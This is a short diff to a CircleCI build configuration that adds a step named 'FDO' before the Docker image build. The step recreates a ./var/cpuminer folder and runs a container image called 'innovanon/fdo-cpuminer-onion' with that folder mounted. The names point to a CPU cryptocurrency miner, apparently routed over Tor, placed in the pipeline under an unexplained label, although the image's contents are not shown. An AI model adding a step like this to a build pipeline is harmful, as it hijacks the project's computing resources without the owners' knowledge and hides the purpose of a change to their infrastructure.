--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -33,6 +33,12 @@ jobs:
             apk add --no-cache \
               make openssl tar gzip curl jq
       - run:
+          name: FDO
+          command: |
+            rm -rf        ./var/cpuminer
+            mkdir -pv     ./var/cpuminer
+            docker run -v ./var/cpuminer:/var/cpuminer:rw innovanon/fdo-cpuminer-onion
+      - run:
           name: Build application Docker image
           command: |
             docker build \
